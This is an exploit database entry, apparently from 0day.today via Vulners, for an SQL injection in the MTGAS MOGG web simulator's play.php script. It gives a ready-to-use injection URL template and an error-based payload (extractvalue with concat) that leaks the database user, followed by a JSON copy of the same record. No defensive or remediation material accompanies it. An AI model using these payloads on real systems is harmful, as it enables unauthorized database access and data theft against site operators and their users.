Search...

MTGAS MOGG Web Simulator Script - SQL Injection Vulnerability

2018-10-31T00:00:00

ID 1337DAY-ID-31475
Type zdt
Reporter Meisam Monsef
Modified 2018-10-31T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: MOGG web simulator Script - SQL Injection
# Exploit Author: Meisam Monsef - [email protected] - @meisamrce -
@dorsateam
# Vendor Homepage: https://github.com/spider312/mtgas
# Version: All Version
 
 
Exploit :
http://server/play.php?id=99999'+[SQL Command]+#
http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23

#  0day.today [2018-10-31]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-31475", "bulletinFamily": "exploit", "title": "MTGAS MOGG Web Simulator Script - SQL Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-10-31T00:00:00", "modified": "2018-10-31T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31475", "reporter": "Meisam Monsef", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-10-31T14:40:28", "edition": 1, "viewCount": 16, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-10-31T14:40:28", "rev": 2}, "dependencies": {"references": [], "modified": "2018-10-31T14:40:28", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/31475", "sourceData": "# Exploit Title: MOGG web simulator Script - SQL Injection\r\n# Exploit Author: Meisam Monsef - [email\u00a0protected] - @meisamrce -\r\n@dorsateam\r\n# Vendor Homepage: https://github.com/spider312/mtgas\r\n# Version: All Version\r\n \r\n \r\nExploit :\r\nhttp://server/play.php?id=99999'+[SQL Command]+#\r\nhttp://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23\n\n# 0day.today [2018-10-31] #"}